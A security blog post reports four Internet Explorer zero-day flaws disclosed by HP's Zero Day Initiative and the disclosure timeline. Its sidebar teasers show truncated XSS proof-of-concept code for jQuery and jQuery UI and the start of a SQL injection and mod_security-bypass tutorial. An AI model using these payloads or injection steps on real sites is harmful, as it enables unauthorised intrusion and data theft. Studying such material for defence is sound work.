Four Zero Day Vulnerabilities Discovered in Internet Explorer!

How many Zero-Days do you think could hit Microsoft today? Neither one nor two; this times its Four.

Hewlett-Packard’s Zero-Day Initiative greeted Microsoft today with not one but four zero day vulnerabilities located in Internet Explorer, allowing hackers to remotely execute a malicious code on target machine. At first it was thought that these vulnerabilities would affect only desktop version of Microsoft’s very own web browser, however later it was reported that even mobile versions are vulnerable.

All the four zero-days originally were reported to Microsoft, affecting Internet Explorer on the desktop. However, later it was discovered that the zero-day vulnerabilities affected Internet Explorer Mobile on Windows Phones as well.

Four Zero-day vulnerabilities Disclosed by ZDI

Here are the zero-day vulnerabilities, as reported by ZDI:

    ZDI-15-359: AddRow Out-Of-Bounds Memory Access Vulnerability
    ZDI-15-360: Use-After-Free Remote Code Execution Vulnerability
    ZDI-15-361: Use-After-Free Remote Code Execution Vulnerability
    ZDI-15-362: Use-After-Free Remote Code Execution Vulnerability

All of them are important discoveries however ZDI-15-359 is the most critical, since it relates to how IE processes arrays representing cells in HTML Tables. Hacker can force IE to use the memory past the end of an array of HTML cells by altering elements of the document itself. This allows attack to execute code under the context of the current process.

The most critical vulnerability out of the four bugs is the AddRow Out-Of-Bounds Memory Access flaw that affects the way Internet Explorer handles some specific arrays.
    "The vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables," says the advisory issued by the Zero Day Initiative. "By manipulating a document’s elements an attacker can force the Internet Explorer (IE) to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process."

Another vulnerability the company disclosed is a bug in how Internet Explorer handles CAttrArray objects. The vulnerability could allow an attacker to manipulate a document's elements in an attempt to force a free dangling pointer to be reused, leveraging the attacker to execute malicious code on victim's machine.

Microsoft has fixed all the four zero-day vulnerabilities in the desktop version of its browser, but the flaws remain open on Internet Explorer Mobile.

HP's Zero Day Initiative does not slack with its 120-day disclosure policy. It notified Microsoft of the first zero-day flaw on November 12, 2014, and extended the disclosure deadline to May 12, 2015, then again to July 19. However, with no patch forthcoming, ZDI went public on July 22.





Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more

Bypass Mod_Security

Image
This topic is similar as Manual Sql Injection. But mod_security are protect to hack website. You can see in this screenshot. Now In this tutorial we can learn how to bypass mod_security First we need one Target Website In My case I am using this website: http://www.target.com.pk Finding The Amount Of Columns Now that you found a vulnerable site, you need to find the amount of columns. You can do this by using the "Order By" function. Your link should now look like this: Code: http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error) http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error) Finding Vulnerable Columns So now that you got the amount of columns, you're going to want to see
Read more